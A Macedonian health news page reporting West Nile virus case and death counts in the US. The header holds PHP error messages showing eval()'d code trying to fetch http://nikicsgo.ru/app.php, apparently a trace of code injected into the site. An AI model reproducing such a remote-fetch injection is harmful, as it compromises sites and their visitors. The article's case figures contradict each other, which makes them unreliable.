Вирусот на Западен Нил сеуште забрзано се шири во САД | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

ИНФЕКТОЛОГИЈА

                           
                           
                           
                       

Вирусот на Западен Нил сеуште забрзано се шири во САД

Бројот на случаеви заразени од вирусот на Западен Нил во изминатата недела во САД порасна за една третина – предупредуваат институциите.







Ширењето на оваа опасна болест која ја пренесуваат комарците зема сериозен замав – предупредуваат американските експерти. Овој вирус може да предизвика епидемија со огромни размери, а последиците можат да бидат катастрофални.



Моментално со симптоми на вирусот на Западен Нил има пријавено 2 636 случаеви, што е за 1993 случаеви повеќе од минатата недела, а бројот продолжува забрзано да расте предупредуваат од Центарот за контрола и превенција на болести во САД (CDC).



Оваа недела од Вирусот на западен Нил починале вкупно 118 луѓе, во споредба со минатата недела, каде бројот на смртни случаеви од оваа болест изнесувал 87.



Болеста е забележана во вкупно 48 држави во Соединетите Американски Држави, а луѓето биле заразени преку птици и комарци. Од сите вкупно заразени 40 % се наоѓаат во Тексас и експертите алармираат дека е крајно време да се превземе нешто сериозно, во спротивно последиците би можеле да бидат многу катастрофални.

ЗА ЗДРАВЈЕ NEWSLETTER